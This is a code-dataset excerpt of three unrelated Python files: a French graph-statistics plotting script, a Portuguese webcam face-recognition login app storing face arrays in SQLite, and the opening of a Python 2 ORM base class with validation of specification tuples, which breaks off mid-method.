coords.append((min(mini), mean(moy), max(maxi), variance(var)))\n return coords\n\n\ndef traitement_diam(name):\n list_dir = os.listdir(name)\n l = []\n for dir in list_dir:\n list_dir2 = os.listdir(name + '/' + dir)\n for dir2 in list_dir2:\n with open(name + '/' + dir + '/' + dir2 + '/data.txt') as json_file:\n data = json.load(json_file)\n l.append((data[\"nb_nodes\"], data[\"diameter\"], data[\"nb_attributs\"]))\n return l\n\n\ndef traitement_dens(name):\n list_dir = os.listdir(name)\n l = []\n for dir in list_dir:\n list_dir2 = os.listdir(name + '/' + dir)\n for dir2 in list_dir2:\n print(dir, dir2)\n with open(name + '/' + dir + '/' + dir2 + '/data.txt') as json_file:\n data = json.load(json_file)\n l.append((data[\"nb_nodes\"], data[\"density\"], data[\"nb_attributs\"]))\n return l\n\n\n# plt.plot(np.arange(3, 18), np.array(l1[1]), label=\"Barabasi_Albert\")\n# plt.plot(np.arange(3, 21), np.array(l2[1]), label=\"Erdos_Renyi\")\n# plt.plot([3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17], l[1])\n# plt.legend()\n# plt.show()\n\n\ndef regression_exp(y, n, title):\n a_min, b_min, r_min, p_value_min, std_err_min = linregress(np.arange(3, n + 1), np.log(np.array(y[0])))\n a_max, b_max, r_max, p_value_max, std_err_max = linregress(np.arange(3, n + 1), np.log(np.array(y[1])))\n plt.plot(np.arange(3, n + 1), np.log(np.array(y[0])), label=\"Minimum\")\n plt.plot(np.arange(3, n + 1), a_min * np.arange(3, n + 1) + b_min, label=\"Regression exponentielle minimum\")\n plt.plot(np.arange(3, n + 1), np.log(np.array(y[1])), label=\"Maximum\")\n plt.plot(np.arange(3, n + 1), a_max * np.arange(3, n + 1) + b_max, label=\"Regression exponentielle maximum\")\n plt.title(title)\n plt.legend()\n\n\ndef regression_poly_et_exp(y, n, title):\n plt.figure()\n\n a_min, b_min, r_min, p_value_min, std_err_min = linregress(np.arange(3, n + 1), np.log(np.array(y[0])))\n a_moy, b_moy, r_moy, p_value_moy, std_err_moy = linregress(np.arange(3, n + 1), np.log(np.array(y[1])))\n a_max, b_max, r_max, p_value_max, std_err_max = linregress(np.arange(3, n + 1), np.log(np.array(y[2])))\n\n plt.subplot(221)\n plt.plot(np.arange(3, n + 1), np.array(y[0]), '+', label=\"Minimum\")\n plt.plot(np.arange(3, n + 1), np.exp(b_min + a_min * np.arange(3, n + 1)),\n label=\"$y = \" + str(round(np.exp(b_min), 2)) + 'e^{' + str(round(a_min, 2)) + 'x} - r = ' + str(\n round(r_min, 3)) + '$')\n coefs = np.polyfit(np.arange(3, n + 1), np.array(y[0]), 2)\n R2 = ((coefs[0] * 
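# The regression_exp/regression_poly_et_exp functions above linearize
# y = A * exp(a * x) by regressing log(y) on x; a self-contained check of
# that transformation with synthetic data:
import numpy as np
from scipy.stats import linregress

x = np.arange(3, 18)
y = 0.5 * np.exp(0.3 * x)  # known A = 0.5, a = 0.3
a, b, r, p, err = linregress(x, np.log(y))  # slope a, intercept log(A)
print(round(a, 3), round(float(np.exp(b)), 3), round(r, 3))  # 0.3 0.5 1.0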
np.arange(3, n + 1) ** 2 + coefs[1] * np.arange(3, n + 1) + coefs[2] - np.array(\n y[0]).mean()) ** 2).sum() / ((np.array(y[0]) - np.array(y[0]).mean()) ** 2).sum()\n plt.plot(np.arange(3, n + 1), coefs[0] * np.arange(3, n + 1) ** 2 + coefs[1] * np.arange(3, n + 1) + coefs[2],\n label=\"$y = \" + str(round(coefs[0], 2)) + 'x^2 + ' + str(round(coefs[1], 2)) + 'x + ' + str(\n round(coefs[2], 2)) + ' - r = ' + str(round(np.sqrt(R2), 3)) + '$')\n plt.title(title + ' - Minimum')\n plt.legend()\n plt.xlim([2, n + 1])\n plt.xticks(np.arange(3, n + 1))\n plt.xlabel(\"Nombre de noeuds\")\n plt.ylabel(\"Nombre d'attributs minimal\")\n\n plt.subplot(222)\n plt.plot(np.arange(3, n + 1), np.array(y[1]), '+', label=\"Moyenne\")\n plt.plot(np.arange(3, n + 1), np.exp(b_moy + a_moy * np.arange(3, n + 1)),\n label=\"$y = \" + str(round(np.exp(b_moy), 2)) + 'e^{' + str(round(a_moy, 2)) + 'x} - r = ' + str(\n round(r_moy, 3)) + '$')\n coefs = np.polyfit(np.arange(3, n + 1), np.array(y[1]), 2)\n R2 = ((coefs[0] * np.arange(3, n + 1) ** 2 + coefs[1] * np.arange(3, n + 1) + coefs[2] - np.array(\n y[1]).mean()) ** 2).sum() / ((np.array(y[1]) - np.array(y[1]).mean()) ** 2).sum()\n plt.plot(np.arange(3, n + 1), coefs[0] * np.arange(3, n + 1) ** 2 + coefs[1] * np.arange(3, n + 1) + coefs[2],\n label=\"$y = \" + str(round(coefs[0], 2)) + 'x^2 + ' + str(round(coefs[1], 2)) + 'x + ' + str(\n round(coefs[2], 2)) + ' - r = ' + str(round(np.sqrt(R2), 3)) + '$')\n plt.title(title + ' - Moyenne')\n plt.legend()\n plt.xlim([2, n + 1])\n plt.xticks(np.arange(3, n + 1))\n plt.xlabel(\"Nombre de noeuds\")\n plt.ylabel(\"Nombre d'attributs moyen\")\n\n plt.subplot(223)\n plt.plot(np.arange(3, n + 1), np.array(y[2]), '+', label=\"Maximum\")\n plt.plot(np.arange(3, n + 1, 0.1), np.exp(b_max + a_max * np.arange(3, n + 1, 0.1)),\n label=\"$y = \" + str(round(np.exp(b_max), 2)) + 'e^{' + str(round(a_max, 2)) + 'x} - r = ' + str(\n round(r_max, 3)) + '$')\n coefs = np.polyfit(np.arange(3, n + 1), np.array(y[2]), 2)\n R2 = ((coefs[0] * np.arange(3, n + 1) ** 2 + coefs[1] * np.arange(3, n + 1) + coefs[2] - np.array(\n y[2]).mean()) ** 2).sum() / ((np.array(y[2]) - np.array(y[2]).mean()) ** 2).sum()\n plt.plot(np.arange(3, n + 1, 0.1),\n coefs[0] * np.arange(3, n + 1, 0.1) ** 2 + coefs[1] * np.arange(3, n + 1, 0.1) + coefs[2],\n label=\"$y = \" + str(round(coefs[0], 2)) + 'x^2 + ' + str(round(coefs[1], 2)) + 'x + ' + str(\n round(coefs[2], 2)) + ' - r = ' + str(round(np.sqrt(R2), 3)) + '$')\n plt.title(title + ' - Maximum')\n plt.legend()\n plt.xlim([2, n + 1])\n plt.xticks(np.arange(3, n + 1))\n plt.xlabel(\"Nombre de noeuds\")\n plt.ylabel(\"Nombre d'attributs maximal\")\n\n plt.subplot(224)\n plt.plot(np.arange(3, n + 1), np.array(y[3]), '+', label=\"Variance\")\n plt.title(title + ' - Variance')\n plt.legend()\n plt.xlim([2, n + 1])\n plt.xticks(np.arange(3, n + 1))\n plt.xlabel(\"Nombre de noeuds\")\n plt.ylabel(\"Variance\")\n\n\n# ### Barabasi-Albert : Maximum, Minimum, Moyenne, Variance et Nuage de points ###\n#\n# data_ba = traitement(\"Barabasi_Albert\", \"nb_attributs\")\n# l1 = [*zip(*data_ba)]\n# plt.figure()\n# plt.plot(np.array(l1[0]), np.array(l1[1]), '+')\n# plt.title(\"Nombre d'attributs en fonction du nombre de sommets - Barabasi-Albert\")\n# plt.xlim([2, 17])\n# plt.xticks(np.arange(3, 17))\n# plt.xlabel(\"Nombre de noeuds\")\n# plt.ylabel(\"Nombre d'attributs\")\n#\n# data_ba = traitement_par_nb_nodes(\"Barabasi_Albert\", \"nb_attributs\", 17)\n# l1 = [*zip(*data_ba)]\n# regression_poly_et_exp(l1, 17, 
\"Barabasi-Albert\")\n#\n#\n# ### Erdos-Renyi : Maximum, Minimum, Moyenne, Variance et Nuage de points ###\n#\n# data_er = traitement(\"Erdos_Renyi\", \"nb_attributs\")\n# l2 = [*zip(*data_er)]\n# plt.figure()\n# plt.plot(np.array(l2[0]), np.array(l2[1]), '+')\n# plt.title(\"Nombre d'attributs en fonction du nombre de sommets - Erdos-Renyi\")\n# plt.xlim([2, 22])\n# plt.xticks(np.arange(3, 22))\n# plt.xlabel(\"Nombre de noeuds\")\n# plt.ylabel(\"Nombre d'attributs\")\n#\n#\n# data_er = traitement_par_nb_nodes(\"Erdos_Renyi\", \"nb_attributs\", 21)\n# l2 = [*zip(*data_er)]\n# regression_poly_et_exp(l2, 21, \"Erdos-Renyi\")\n#\n#\n# ### Watts-Strogatz : Maximum, Minimum, Moyenne, Variance et Nuage de points ###\n#\n#\n# data_ws = traitement(\"Watts_Strogatz\", \"nb_attributs\")\n# l3 = [*zip(*data_ws)]\n# plt.figure()\n# plt.plot(np.array(l3[0]), np.array(l3[1]), '+')\n# plt.title(\"Nombre d'attributs en fonction du nombre de sommets - Watts-Strogatz\")\n# plt.xlim([2, 16])\n# plt.xticks(np.arange(3, 16))\n# plt.xlabel(\"Nombre de noeuds\")\n# plt.ylabel(\"Nombre d'attributs\")\n#\n# data_ws = traitement_par_nb_nodes(\"Watts_Strogatz\", \"nb_attributs\", 15)\n# l3 = [*zip(*data_ws)]\n# regression_poly_et_exp(l3, 15, \"Watts-Strogatz\")\n\ndata_all = traitement_par_nb_nodes_list([\"Erdos_Renyi\", \"Watts_Strogatz\", \"Barabasi_Albert\"], \"nb_attributs\", 21)\nl3 = [*zip(*data_all)]\nregression_poly_et_exp(l3, 21, \"Tous\")\nplt.figure()\nplt.plot(np.array(l3[0]), np.array(l3[1]), '+')\nplt.title(\"Nombre d'attributs en fonction du nombre de sommets\")\nplt.xlim([2, 22])\nplt.xticks(np.arange(3, 21))\nplt.xlabel(\"Nombre de noeuds\")\nplt.ylabel(\"Nombre d'attributs\")\n\n#\n# data_dens_ba = traitement_dens(\"Watts_Strogatz\")\n# l = [*zip(*data_dens_ba)]\n#\n# colors = []\n#\n# n_col = {\n# 3: \"black\",\n# 4: \"gray\",\n# 5: \"brown\",\n# 6: \"red\",\n# 7: \"salmon\",\n# 8: \"orange\",\n# 9: \"yellow\",\n# 10: \"greenyellow\",\n# 11: \"limegreen\",\n# 12: \"lime\",\n# 13: \"turquoise\",\n# 14: \"cyan\",\n# 15: \"deepskyblue\",\n# 16: \"blue\",\n# 17: \"indigo\",\n# 18: \"purple\",\n# 19: \"fuchsia\",\n# 20: \"hotpink\",\n# 21: \"pink\",\n# }\n#\n# for n in l[0]:\n# colors.append(n_col[n])\n#\n# for i in range(len(l[0])):\n# plt.plot(l[2][i], l[1][i], '+', color=colors[i])\n# plt.title(\"Densité en fonction du nombre d'attributs\")\n# plt.ylabel(\"Densité\")\n# plt.xlabel(\"Nombre d'attributs\")\n#\n# plt.figure()\n# data_diam_ba = traitement_diam(\"Watts_Strogatz\")\n# l = [*zip(*data_diam_ba)]\n#\n# colors = []\n#\n#\n# for n in l[0]:\n# colors.append(n_col[n])\n#\n# for i in range(len(l[0])):\n# plt.plot(l[2][i], l[1][i], '+', color=colors[i])\n# plt.title(\"Diamètre en fonction du nombre d'attributs\")\n# plt.ylabel(\"Diamètre\")\n# plt.xlabel(\"Nombre d'attributs\")\n\n# plt.figure()\n# plt.plot(np.arange(3, 18, 0.01), y)\n# plt.plot(np.arange(3, 18), np.array(l1[1]), '+')\n\n# data_all = traitement_par_nb_nodes_list([\"Barabasi_Albert\", \"Erdos_Renyi\", \"Watts_Strogatz\"], \"nb_attributs\", 20)\n# l_all = [*zip(*data_all)]\n#\n# plt.figure()\n# plt.plot(np.arange(3, 21), np.array(l_all[0]), label=\"Minimum\")\n# plt.plot(np.arange(3, 21), np.array(l_all[1]), label=\"Maximum\")\n# data = traitement(\"Barabasi_Albert\", \"nb_attributs\") + traitement(\"Erdos_Renyi\", \"nb_attributs\") + traitement(\"Watts_Strogatz\", \"nb_attributs\")\n#\n# plt.plot(*zip(*data), '+')\n\n## Pour déterminer le nombre de points à chaque coordonnée\n\n\n## Poucentage à chaque coordonnées\n\n# nb_graphe = 
{}\n# for n in range(3, 21):\n# somme = 0\n# for a in range(l_all[0][n - 3], l_all[1][n - 3] + 1):\n# nb = data.count((n, a))\n# somme += nb\n# nb_graphe[n] = somme\n#\n# for n in range(3, 21):\n# for a in range(l_all[0][n-3], l_all[1][n-3]+1):\n# nb = (100*data.count((n, a)))/nb_graphe[n]\n# if nb > 0:\n# if nb < 1:\n# color = \"cyan\"\n# elif nb < 2:\n# color = \"turquoise\"\n# elif nb < 3:\n# color = \"lime\"\n# elif nb < 4:\n# color = \"orange\"\n# elif nb < 5:\n# color = \"yellow\"\n# else:\n# color=\"red\"\n# occu[(n, a)] = color\n#\n# plt.figure()\n# for coords in occu:\n# plt.plot(coords[0], coords[1], '+', color=occu[coords])\n\n\n# nb_graphe = {}\n# for n in range(3, 21):\n# somme = 0\n# for a in range(l_all[0][n - 3], l_all[1][n - 3] + 1):\n# nb = data.count((n, a))\n# somme += nb\n# nb_graphe[n] = somme\n#\n# occu = {}\n# for n in range(3, 21):\n# occu[n] = {}\n# for a in range(l_all[0][n - 3], l_all[1][n - 3] + 1):\n# nb = data.count((n,a))\n# occu[n][a] = nb\n#\n# sort_occu = {}\n#\n# total = {}\n#\n# for n in range(3, 21):\n# sort_occu_n = sorted(occu[n].items(), key=lambda x: x[1], reverse=True)\n# sort_occu[n] = sort_occu_n\n# total[n] = len(sort_occu_n)\n#\n# colors = {}\n# for n in sort_occu:\n# tot = total[n]\n# part = tot/6\n# i = 1\n# for a in sort_occu[n]:\n# print(i, part, tot)\n# if i < part or i == 1:\n# color = \"red\"\n# elif i < 2*part or i == 2:\n# color = \"orange\"\n# elif i < 3*part or i == 3:\n# color = \"yellow\"\n# elif i < 4*part or i == 4:\n# color = \"lime\"\n# elif i < 5*part or i == 5:\n# color = \"turquoise\"\n# else:\n# color = \"cyan\"\n# colors[(n, a[0])] = color\n# i += 1\n#\n#\n# plt.figure()\n# for coords in colors:\n# print(coords)\n# plt.plot(coords[0], coords[1], '+', color=colors[coords])\n\n\n# data = traitement_nodes(\"Barabasi_Albert\", \"plus_petit_attribut\", \"closness_centrality\")\n#\n# plt.plot(*zip(*data), '+')\n# plt.show()\n\nplt.show()\n","repo_name":"mlegoue/convex","sub_path":"Aleatoire/traitement.py","file_name":"traitement.py","file_ext":"py","file_size_in_byte":14848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20487805278","text":"import io\nimport cv2\nimport sqlite3\nimport numpy as np\nimport face_recognition\n\nfrom time import sleep\nfrom threading import Thread\nfrom sqlite3 import Error\nfrom PIL import Image, ImageTk, UnidentifiedImageError\n\nfrom front.interface import Interface\n\nclass MenuPrincipal(Interface):\n def _conecxao_db(page):\n try:\n return sqlite3.connect(\"database/pessoas.db\", detect_types = sqlite3.PARSE_DECLTYPES)\n except sqlite3.OperationalError:\n from os import mkdir\n mkdir('database')\n finally:\n return sqlite3.connect(\"database/pessoas.db\", detect_types = sqlite3.PARSE_DECLTYPES)\n\n def _tabela_registros_existe(page, cur):\n return not(cur.execute(\"\"\"SELECT name FROM sqlite_master WHERE type='table' AND name='registros';\"\"\").fetchall() == [])\n\n def _adaptar_array(page, arr):\n out = io.BytesIO()\n np.save(out, arr)\n out.seek(0)\n return sqlite3.Binary(out.read())\n\n def _converter_array(page, text):\n out = io.BytesIO(text)\n out.seek(0)\n return np.load(out)\n\n def _webcam_durante_registro(page):\n cap = cv2.VideoCapture(0, cv2.CAP_DSHOW) \n\n def mostrar_webcam():\n page._criar_frame_webcam()\n\n try:\n while True:\n _, page.captura_webcam = cap.read()\n page.captura_webcam = cv2.flip(page.captura_webcam, 1)\n page.captura_webcam = cv2.resize(page.captura_webcam, (430, 350)) \n cv2image = 
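# The _adaptar_array/_converter_array pair above round-trips numpy arrays
# through sqlite as BLOBs; the same pattern in a minimal standalone form:
import io
import sqlite3
import numpy as np

def adapt_array(arr):
    buf = io.BytesIO()
    np.save(buf, arr)
    return sqlite3.Binary(buf.getvalue())

def convert_array(blob):
    return np.load(io.BytesIO(blob))

sqlite3.register_adapter(np.ndarray, adapt_array)
sqlite3.register_converter('array', convert_array)

conn = sqlite3.connect(':memory:', detect_types=sqlite3.PARSE_DECLTYPES)
conn.execute('CREATE TABLE t (arr array)')
conn.execute('INSERT INTO t (arr) VALUES (?)', (np.arange(6).reshape(2, 3),))
print(conn.execute('SELECT arr FROM t').fetchone()[0])  # 2x3 array restored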
cv2.cvtColor(page.captura_webcam, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(image = img)\n\n if page.webcam_frame.winfo_exists():\n page.webcam_frame.imgtk = imgtk\n page.webcam_frame.configure(image = imgtk)\n else: \n break\n\n if page.continuar_mostrando_webcam:\n sleep(0.01) \n cv2.destroyAllWindows()\n while not page.continuar_mostrando_webcam:\n sleep(0.005)\n \n except cv2.error:\n page._tela_de_aviso(\"Ocorreu um erro!\\nSua webcam não está disponível.\")\n page.frame_registro.destroy()\n\n page.thread1 = Thread(target = mostrar_webcam, daemon = True)\n page.thread1.start()\n\n def _botao_login_clicado(page):\n sqlite3.register_converter(\"array\", page._converter_array) \n \n conn = page._conecxao_db()\n cur = conn.cursor()\n\n if page._tabela_registros_existe(cur):\n page._criar_interface_login()\n\n Thread(target = page._login_webcam, daemon = True).start()\n Thread(target = page._login_validacao, args = (cur.execute(\"SELECT * FROM registros\").fetchall(), ), daemon = True).start() \n else:\n page._tela_de_aviso(\"Não há ninguém registrado no momento!\") \n\n conn.close()\n\n def _login_webcam(page):\n trained_data = cv2.CascadeClassifier('./frontal-face-data.xml')\n webcam = cv2.VideoCapture(0, cv2.CAP_DSHOW)\n\n page._criar_frame_webcam()\n\n def mostrar_webcam():\n try:\n _, page.captura_webcam = webcam.read()\n page.captura_webcam = cv2.flip(page.captura_webcam, 1)\n page.captura_webcam = cv2.resize(page.captura_webcam, (430, 350))\n\n for (x, y, w, h) in trained_data.detectMultiScale(cv2.cvtColor(page.captura_webcam, cv2.COLOR_BGR2GRAY)):\n cv2.rectangle(page.captura_webcam, (x, y), (x + w, y + h), (0, 255, 0), 2)\n \n imgtk = ImageTk.PhotoImage(image = Image.fromarray(cv2.cvtColor(page.captura_webcam, cv2.COLOR_BGR2RGBA)))\n page.webcam_frame.imgtk = imgtk\n page.webcam_frame.configure(image = imgtk)\n page.webcam_frame.after(10, mostrar_webcam)\n except (TypeError, cv2.error):\n pass \n mostrar_webcam()\n\n def _login_validacao(page, pessoas):\n def atualizar_texto_validando():\n while page.continuar_atualizando_texto:\n for i in range(4):\n if page.continuar_atualizando_texto:\n page.texto_validando.configure(text = \"VALIDANDO\" + ('.' 
* i))\n sleep(0.5)\n else:\n break\n\n while True:\n t = Thread(target = atualizar_texto_validando)\n try:\n encoding_desconhecida = face_recognition.face_encodings(page.captura_webcam)[0]\n\n page.texto_validando.place(relx = 0.439, rely = 0.867, height = 19, width = 200)\n page.continuar_atualizando_texto = True\n t.start()\n \n for registrado in pessoas:\n encoding_img_registrada = face_recognition.face_encodings(registrado[2])[0]\n resultado = face_recognition.compare_faces([encoding_img_registrada], encoding_desconhecida, tolerance = 0.6)\n \n if resultado[0]:\n sleep(2)\n cv2.destroyAllWindows()\n page.continuar_atualizando_texto = False \n page.frame_feed_webcam.destroy()\n page._exibir_dados_confidenciais(registrado[0], registrado[1])\n break\n \n if resultado[0]:\n break\n else:\n page.continuar_atualizando_texto = False\n page.texto_validando.place(relx=0.285, rely=0.867, height=19, width=300)\n page.texto_validando.configure(text=\"Você não está cadastrado neste banco de dados.\")\n sleep(2)\n\n except (IndexError, FileNotFoundError, UnidentifiedImageError):\n if page.frame_login.winfo_exists():\n page.texto_validando.place(relx=0.325, rely=0.867, height=19, width=200)\n page.texto_validando.configure(text=\"Não foi possível identificar uma face.\")\n sleep(2) \n except TypeError:\n page.frame_login.destroy()\n page._tela_de_aviso(\"Ocorreu um erro!\\nSua webcam não está disponível.\")\n break\n except AttributeError:\n sleep(0.3)\n\n def _salvar_database(page, nome, cargo):\n def ja_cadastrado(pessoas):\n try:\n encoding_desconhecida = face_recognition.face_encodings(page.captura_webcam)[0]\n\n for registrado in pessoas:\n encoding_img_registrada = face_recognition.face_encodings(registrado[2])[0]\n resultado = face_recognition.compare_faces([encoding_img_registrada], encoding_desconhecida, tolerance = 0.6)\n \n if resultado[0]:\n return 1\n return 0\n except (IndexError, FileNotFoundError, UnidentifiedImageError):\n return -1\n\n sqlite3.register_converter(\"array\", page._converter_array)\n sqlite3.register_adapter(np.ndarray, page._adaptar_array)\n\n conn = page._conecxao_db() \n cur = conn.cursor()\n cur.execute(\"CREATE TABLE IF NOT EXISTS registros (nome text, cargo int, arr array)\")\n\n temp = ja_cadastrado(cur.execute(\"SELECT * FROM registros\").fetchall())\n if temp == 1:\n page._tela_de_aviso(\"Você já está registrado neste programa.\")\n page.continuar_mostrando_webcam = True\n page.botao_confirmar_registro.lower()\n elif temp == 0: \n cur.execute(\"INSERT INTO registros (nome, cargo, arr) VALUES (?, ?, ?)\", (nome, cargo, page.captura_webcam, ))\n conn.commit()\n page.thread1.join(0.001)\n page.frame_registro.destroy()\n page._tela_de_aviso(\"Você foi registrado com sucesso!\")\n elif temp == -1:\n page._tela_de_aviso(\"Nenhum rosto foi detectado na imagem.\")\n page.continuar_mostrando_webcam = True\n page.botao_confirmar_registro.lower()\n \n conn.close()\n\nif __name__ == \"__main__\":\n MenuPrincipal()","repo_name":"biarodriguesch/Login_reconhecimento_facial","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8477,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26029822","text":"from inspect import getmembers\nfrom DatabaseInterface import DBInterface\nfrom config import TYPE_MAPPING\n\n\nclass ModelBase(object):\n \"\"\"\n The Base Model class\n \n All other models should be based on this class\n \n Models can set their own instance variables by declaring them as 
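# The login validation above reduces to this face_recognition pattern; a
# sketch with hypothetical image paths (known.jpg and unknown.jpg are
# placeholders):
import face_recognition

known = face_recognition.load_image_file('known.jpg')
unknown = face_recognition.load_image_file('unknown.jpg')

known_enc = face_recognition.face_encodings(known)[0]    # [0] raises IndexError if no face found
unknown_enc = face_recognition.face_encodings(unknown)[0]

# tolerance=0.6 is the library default; lower values are stricter
match = face_recognition.compare_faces([known_enc], unknown_enc, tolerance=0.6)
print(match)  # e.g. [True]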
class\n variables and setting a specification tuple like so\n \n class TheClass(ModelBase):\n title = (default,pythonType,SQLType,validationFunction)\n \n where \n default is a default value for intialization\n pythonType is a Python type for the value, used in validation\n SQLType is a string representing an SQL type such as \"integer\" or \"varchar\"\n used when saving the value to the database or creating the table\n validationFunction (optional) a function that takes one argument and\n returns either True or an error message\n \n Instances should only be created using the \"create\" method of the model, such as\n \n the_class_instance = TheClass.create()\n \n __dict__ structure\n ['status'] - data not needed in the database`\n ['_is_dirty'] - if the model has been updated since its last save\n ['attrs'] - data NEEDED in the database\n ['id'] - the primary key of the model in the database\n columns defined in the child class\n \"\"\"\n #holds the one database connection for all models\n db_interface = DBInterface.get_interface()\n \n #dict to track all model instances\n #key is the class and value is a list of all instances\n all_models = {}\n \n \"\"\"\n holds model-specific information\n format\n [classname] - the name of the class that inherits from ModelBase\n ['tablename'] - stores the name of the table used in the database\n ['table_exists'] - stores True once the database has checked for the table\n and found it\n ['has_been_checked'] - stores True if the model has successfully passed the \n tests in ModelBase.check_model\n \"\"\"\n model_data = {}\n\n\n @classmethod\n def get_all_models(cls):\n \"\"\"\n returns a list of all instances of a given model class\n instances are tracked in ModelBase.all_models\n \"\"\"\n if not ModelBase.all_models.has_key(cls):\n return []\n #return a copy of the list so that the actual list cannot be altered \n #by the caller\n return ModelBase.all_models[cls][:]\n \n @classmethod\n def track_model(cls,model):\n \"\"\"\n adds an instance of a model to the tracking dictionary, ModelBase.all_models\n \"\"\"\n if not ModelBase.all_models.has_key(cls):\n ModelBase.all_models[cls] = [model]\n return\n ModelBase.all_models[cls].append(model)\n\n @classmethod\n def create(cls):\n \"\"\"\n returns a new instance of the Model\n initializes the __dict__ attribute using the specification tuple from the \n class from which it is called\n \"\"\"\n result = cls.check_model()\n if result != True:\n print(result)\n return None\n m = ModelBase()\n m.__dict__['status'] = {'_is_dirty':True}\n m.__dict__['status']['child_class'] = cls\n m.__dict__['attrs'] = {}\n for attr in cls.get_super_attrs():\n m.__dict__['attrs'][attr] = getattr(cls,attr)[0]\n cls.track_model(m)\n m.set_tablename()\n return m\n \n @classmethod\n def check_model(cls):\n \"\"\"\n checks the format of the specification tuples in the child class definition\n \"\"\"\n this_func_name = \"ModelBase.check_model\"\n if ModelBase.model_data.has_key(cls) and \\\n ModelBase.model_data[cls].has_key(\"has_been_checked\") and \\\n ModelBase.model_data[cls][\"has_been_checked\"] == True:\n return True\n for attr in cls.get_super_attrs():\n spec_tuple = getattr(cls,attr)\n if type(spec_tuple[0]) not in TYPE_MAPPING.keys():\n #error message 0\n return error_message(this_func_name,0,(cls,spec_tuple[0],type(spec_tuple[0])))\n if spec_tuple[1] not in TYPE_MAPPING.keys():\n #error message 1\n return error_message(this_func_name,1,(cls,spec_tuple[1]))\n sql_types = []\n for val in TYPE_MAPPING.values():\n if 
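# Taking the docstring above literally, a subclass is declared with
# specification tuples only. This sketch assumes the ModelBase class defined
# above; Movie and year_validator are hypothetical examples mirroring the
# validator contract (return True or an error-message string):
def year_validator(year):
    if year < 1870:
        return 'Year must be greater than 1869'
    return True

class Movie(ModelBase):
    id = (None, int, 'serial PRIMARY KEY')
    title = (None, str, 'varchar')
    year = (None, int, 'integer', year_validator)

movie = Movie.create()  # instances come from create(), never Movie()
movie.year = 1985       # routed through __setattr__ for type and custom validation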
isinstance(val,list):\n sql_types += [v.lower() for v in val] \n else:\n sql_types.append(val.lower())\n sql_types.append(\"serial primary key\")\n if spec_tuple[2].lower() not in sql_types:\n #error message 2\n return error_message(this_func_name,2,(cls,spec_tuple[2]))\n if len(spec_tuple) > 3:\n if not hasattr(spec_tuple[3],'__call__'):\n #error message 3\n return error_message(this_func_name,3,(cls,spec_tuple[3]))\n if spec_tuple[0] != None:\n if type(spec_tuple[0]) != spec_tuple[1]:\n #error message 4\n return error_message(this_func_name,4,(cls,spec_tuple[0],spec_tuple[1]))\n if not ModelBase.model_data.has_key(cls):\n ModelBase.model_data[cls] = {}\n if not ModelBase.model_data[cls].has_key(\"has_been_checked\"): \n ModelBase.model_data[cls][\"has_been_checked\"] = True\n return True\n \n @classmethod\n def get_super_attrs(cls):\n \"\"\"\n returns strings representing the attribute names of the calling class\n only returns attributes that are not part of ModelClass\n it should only return the names of the specification tuples\n uses inspect.getmembers\n \"\"\"\n all_attrs = [x[0] for x in getmembers(cls)]\n model_base_attrs = [x[0] for x in getmembers(ModelBase)]\n super_attrs = []\n for attr in all_attrs:\n #skip it if it's a builtin\n if attr.startswith('__'):\n continue\n #skip it if it's in ModelBase\n if attr in model_base_attrs:\n continue\n super_attrs.append(attr)\n return super_attrs\n\n def set_tablename(self):\n \"\"\"\n creates the tablename and saves it into the ModelBase.model_data dict at \n model_data['tablename']\n the tablename is just the all lowercase classname with '_table' appended\n \"\"\"\n the_class = self.child_class\n if not ModelBase.model_data.has_key(the_class):\n ModelBase.model_data[the_class] = {}\n if not ModelBase.model_data[the_class].has_key(\"tablename\"):\n the_name = the_class.__name__.lower() + \"_table\"\n ModelBase.model_data[the_class][\"tablename\"] = the_name\n \n def get_tablename(self):\n \"\"\"\n retrieves the tablename from ModelBase.model_data[\"tablename\"]\n \"\"\"\n return ModelBase.model_data[self.child_class]['tablename']\n \n def __getattr__(self,attr):\n \"\"\"\n overrides base __getattr__ functionality to use __dict__\n \"\"\"\n if attr.lower() == 'tablename':\n return self.get_tablename()\n if self.__dict__['status'].has_key(attr):\n return self.__dict__['status'].get(attr)\n if self.__dict__['attrs'].has_key(attr):\n return self.__dict__['attrs'].get(attr)\n return None\n\n def get_columns(self):\n \"\"\"\n returns self.__dict__['attrs'] which contains the data that the database\n cares about\n \"\"\"\n return self.__dict__['attrs'].copy()\n\n def __setattr__(self,name,value):\n \"\"\"\n overrides base __setattr__ functionality to use __dict__\n uses the Python type defined in the specification tuple of the class for \n validation and will case the 'value' as the Python type if necessary\n uses the optional custom validation function defined in the specification\n tuple if it exists\n prints error messages if it encounters an issue\n \"\"\"\n #don't allow direct setting of __dict__\n this_func_name = \"ModelBase.__setattr__\"\n if name == \"__dict__\":\n return\n if self.__dict__['status'].has_key(name):\n self.__dict__['status'][name] = value\n return None\n if not self.__dict__['attrs'].has_key(name):\n #error message 5\n print(error_message(this_func_name,5,(name,self.child_class)))\n return None\n #TYPE VALIDATION\n specification = getattr(self.child_class,name)\n correct_type = specification[1]\n if not 
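# get_super_attrs above works by diffing inspect.getmembers(cls) against
# getmembers(ModelBase); the core trick in isolation:
from inspect import getmembers

class Base:
    shared = 1

class Child(Base):
    own = ('default', str, 'varchar')

base_names = {name for name, _ in getmembers(Base)}
child_only = [name for name, _ in getmembers(Child)
              if not name.startswith('__') and name not in base_names]
print(child_only)  # ['own']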
isinstance(value,correct_type):\n try:\n value = correct_type(value)\n except:\n #error message 6\n print(error_message(this_func_name,6,(value,correct_type,self.child_class)))\n return None\n if len(specification) <= 3:\n #set the value if there is not custom validation\n self.__dict__['attrs'][name] = value\n return None\n #CUSTOM VALIDATION\n validator = specification[3]\n result = validator(value)\n if result == True:\n self.__dict__['attrs'][name] = value\n else:\n #error message 7\n print(error_message(this_func_name,7,(value,validator,result,self.child_class)))\n return None\n #if we make it all the way to the end, the value has been set and the object\n #is now different from that in the database\n self.__dict__['status']['_is_dirty'] = True\n \n def verify_table_exists(self):\n \"\"\"\n check if the table for this model exists in the database and create it\n if necessary\n once it exists, set the model_data[class]['table_exists'] flag to True\n \"\"\"\n if ModelBase.model_data[self.child_class].get('table_exists'): return True\n if ModelBase.db_interface.does_table_exist(self.get_tablename()):\n 